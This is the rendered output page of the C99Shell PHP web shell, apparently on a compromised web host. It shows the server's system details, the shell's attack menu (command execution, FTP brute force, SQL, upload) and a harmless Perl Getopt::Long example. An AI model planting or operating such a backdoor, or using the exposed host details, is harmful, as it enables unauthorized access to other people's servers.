!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux web25.us.cloudlogin.co 5.10.237-xeon-hst #1 SMP Mon May 5 15:10:04 UTC 2025 x86_64 

uid=233359(alpastrology) gid=888(tty) groups=888(tty),33(tape) 

Safe-mode: OFF (not secure)

/usr/share/doc/perl-Getopt-Long/examples/   drwxr-xr-x
Free 6181.94 GB of 6263.14 GB (98.7%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     parsetime.pl (1.19 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl

# This is a (working) example of how to write a helper routine for
# Getopt::Long to deal with specific cases.
#
# The basic principle is:
#   - specify the option type to be string
#   - specify a code reference to handle the parsing an assignment.
#
# This example parses time specifications in the form HH:MM:SS.mmm, where
# unneeded parts may be left out.

use strict;
use warnings;
use Getopt::Long;

# The helper routine. It will be called to handle the actual delivery
# of the option value.
# There are two parameters: the option name, and the value to be
# assigned.
# Note the use of 'die' to signal errors back to Getopt::Long.

sub parsetime {
    my ($opt_name, $opt_value) = @_;
    my $val = 0;
    unless ( $opt_value =~ /
    ^        # beginning of value string
    (?:(\d+):)?    # hours
    (?:(\d+):)?    # minutes
    (\d+(?:\.\d+)?)    # seconds + fraction
    $        # end of value string
    /x ) {
    die("Value \"$opt_value\" invalid for option $opt_name\n");
    }

    # Return the value.
    ( defined $1 ? 3600*$1 : 0) +
    ( defined $2 ?   60*$2 : 0) +
    $3;
}

@ARGV = ("-time", "1:24.14") unless @ARGV;

my $time;
GetOptions("time=s" => sub { $time = &parsetime }) &&
  print "time = $time seconds\n";


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0154 ]--